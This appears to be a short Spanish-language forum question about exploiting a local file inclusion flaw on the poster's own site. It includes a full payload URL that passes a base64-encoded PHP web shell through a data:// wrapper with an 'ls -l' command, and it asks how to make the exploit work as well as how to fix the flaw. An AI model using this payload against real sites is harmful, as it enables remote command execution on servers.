Encontré LFI en mi sitio web y traté de explotarlo, pero cuando uso php: // input or data: // no funciona, no puedo obtener el shell.
Ejemplo: .index.php?lang=data:;base64,PD9zeXN0ZW0oJF9HRVRbJ3gnXSk7Pz4=&x=ls -l
He encontrado <?system($_GET['x']);?>
impreso en el código fuente de la página (ctrl + f)
-
¿Cómo puedo explotarlo?
-
¿Cómo puedo solucionarlo?